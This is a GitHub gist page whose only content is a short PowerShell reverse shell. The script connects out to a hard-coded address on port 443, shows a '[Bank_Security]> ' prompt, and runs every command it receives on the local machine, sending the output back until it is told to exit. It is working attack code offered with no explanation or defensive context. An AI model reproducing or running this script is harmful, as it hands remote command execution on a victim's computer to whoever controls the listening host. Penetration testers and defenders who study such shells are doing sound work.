Skip to content

Instantly share code, notes, and snippets.

@BankSecurity
Created September 8, 2019 19:39
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save BankSecurity/1331966b0ce166357d2ba05813ea89aa to your computer and use it in GitHub Desktop.
Save BankSecurity/1331966b0ce166357d2ba05813ea89aa to your computer and use it in GitHub Desktop.
$socket = new-object System.Net.Sockets.TcpClient("172.16.217.130",443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
$writer.Write("[Bank_Security]> ");
$writer.Flush();
$read = $null;
while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$out = $out.split()
$res = [string](&$out[0] $out[1..$out.length]);
if($res -ne $null){ $writer.WriteLine($res)}
}
}While (!$out.equals("exit"))
$writer.close();$socket.close();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment